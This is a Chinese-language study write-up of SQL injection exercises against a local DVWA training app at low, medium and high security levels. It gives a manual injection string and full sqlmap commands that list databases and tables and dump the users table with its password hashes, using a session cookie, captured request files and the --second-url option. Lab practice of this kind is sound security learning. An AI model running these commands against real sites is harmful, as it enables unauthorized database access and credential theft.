SQL注入
-
-
- ==这里注入灵魂:practice make**s** perfect~==
-
- LOW就完了
-
- *手动注入
- *sqlmap注入
- Mid就完了
-
- *sqlmap注入
- High就完了
-
- *sqlmap注入
这里注入灵魂:practice make perfect~
LOW就完了
*手动注入
1.猛猛判断过程:
1’ and ‘1’='1
根据order by判断几列 正确判断有两列回显 在结果中找到可疑信息: 查到名字为dvwa库名和其中的名称users的可疑表。 最后通过md五转密文得出结果。
*sqlmap注入
思路依旧:库-表-列–用户密码
sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” --dbs -batch
- cookie其功能是保持客户端和服务器的状态,以验证是否来自同一服务器。因此,需要登录的访问应携带指定的当前访问cookie身份验证。 –dbs 获取数据库信息 -batch 批处理?maybe
对可疑库名dvwa进行检测 sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” -D dvwa --tables --batch
对可疑表名users go on to detect sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj; security=low” -D dvwa -T users --dump --batch –dump指令用于导出相应表中的数据
okk了 skr
Mid就完了
*sqlmap注入
针对post提交方法,sqlmap使用burpsuite获取request信息>txt格式
sqlmap -r request.txt --dbs sqlmap -r request.txt -D dvwa --tables sqlmap -r request.txt -D dvwa -T users --dump --batch
okk了
High就完了
*sqlmap注入
本打算在这里继续mid中使用burp对request头加上referer测试关键词,但不知道为什么失败。 high比上边多了一个重定向部分: Referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/ sqlmap -r high.txt --referer “http://127.0.0.1/DVWA/vulnerabilities/sqli/” -p referer --level 3 --dbs 我觉得这里应该很难。…
方法一: 因此,知难而退的学者本人决定使用它–second-url的方法来 参考仙女的实验步骤:DVWA练习——sql注入
sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli/session-input.php” --data=“id=1&Submit=Submit” --second-url=“http://127.0.0.1/DVWA/vulnerabilities/sqli/” --cookie=“PHPSESSID=b265u8q8sm3udictrkh1u1cdbj;security=high” --dbs -batch
-u的url是提交页面 –second-url是显示页面
*改错:知道为什么,因为burp一开始抓到的是click页面包,但要抓的是提交页面的包进行检测。 补充方法二: 正确的包应该是提交数据后 之后>high.txt
sqlmap -r high.txt --dbs
改错的灵感来自方法一中的两个url区别的理解~